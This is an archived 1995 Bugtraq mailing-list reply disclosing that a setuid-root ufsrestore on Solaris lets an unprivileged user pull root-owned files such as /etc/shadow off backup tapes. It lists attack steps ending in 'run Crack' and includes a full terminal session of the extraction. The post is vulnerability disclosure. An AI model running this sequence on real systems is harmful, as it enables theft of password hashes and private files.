Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1995_4

Bugtraq archives for 4th quarter (Oct-Dec) 1995: Re: ufsrestore suid root not a security hole

Re: ufsrestore suid root not a security hole

Eduardo E. Silva (esilvaNETCOM.COM)
Tue, 12 Dec 1995 00:39:30 -0800

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Shams Islam: "SunOS v4.1.3 crash"
Previous message: James Poland: "Re: little whole on Suns concerning /dev/kbd"
In reply to: Sean Vickery: "ufsrestore suid root not a security hole"
Next in thread: mulliganfuture.incog.com: "Re: ufsrestore suid root not a security hole"

Sean Vickery wrote:
>
> On 14 November 1995, Brett Lymn wrote:
> > According to Jake Luck:
> > >
> > >yeah, but what about /usr/sbin/ufsrestore ?
> > >
> > >it is statically linked, utilizes syslog, and suid root.
> > >
> >
> > If you are a BOFH then just kill the setuid bit on ufsrestore.  It
> > means that root has to do the restores but it does close an awful lot
> > of holes (like someone dragging in a QIC and restoring their favourite
> > version of /etc/passwd.... need I say more?).  Or you could just
> > remove the global rx though this may bugger up remote root users.
>
> Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box.  But it is more
> careful than to allow an unprivileged user create or overwrite files just
> anywhere.
>
        BUT, it will let you read ANY file from the tape. Including
        root owned files such as /etc/shadow.

        * Know when UNIX admins runs backups.
        * Extract files with ufsrestore (/etc/shadow)
        * Run Crack.
        * Or you could be reading root's mail, CEO email ...etc,etc
$ pwd
/home/esilva/ED_SILVA
$ date
Mon Dec 11 19:33:13 PST 1995
$ /usr/ucb/whoami
esilva
$ mt -f /dev/rmt/0 status
Exabyte EXB-8500 8mm tape drive:
   sense key(0x0)= No Additional Sense   residual= 0   retries= 0
   file no= 0   block no= 0
$ mt -f /dev/rmt/0 rewind
$ pwd
/home/esilva/ED_SILVA
$ ufsrestore -i /dev/rmt/0cn
ufsrestore >
ufsrestore > ls
.:
 .rhosts       .sh_history   devices/      etc/

ufsrestore > cd etc
ufsrestore > add shadow
ufsrestore > extract
You have not read any volumes yet.
Unless you know which volume your file(s) are on you should start
with the last volume and work towards the first.
Specify next volume #: 1
set owner/mode for '.'? [yn] y
ufsrestore > quit
$ pwd
/home/esilva/ED_SILVA
$ cd etc
$ ls -la
total 8
drwxrwxr-x   2 esilva   other        512 Dec 11 19:54 .
drwxr-xr-x   3 esilva   other        512 Oct 11 21:48 ..
-r--------   1 esilva   other       1144 Oct  9 09:21 shadow.1.la

Now run crack...

--

Thanks!

-Ed                                   _
                                    /\o/\
                                   / <_> \
                                  /^^/ \^^\
                                    /___\
    +---------------------------------------------------------------------+
    |                    Can you see them all around us?                  |
    +---------------------------------------------------------------------+
    |                         esilvanetcom.com                           |
    +---------------------------------------------------------------------+

Next message: Shams Islam: "SunOS v4.1.3 crash"
Previous message: James Poland: "Re: little whole on Suns concerning /dev/kbd"
In reply to: Sean Vickery: "ufsrestore suid root not a security hole"
Next in thread: mulliganfuture.incog.com: "Re: ufsrestore suid root not a security hole"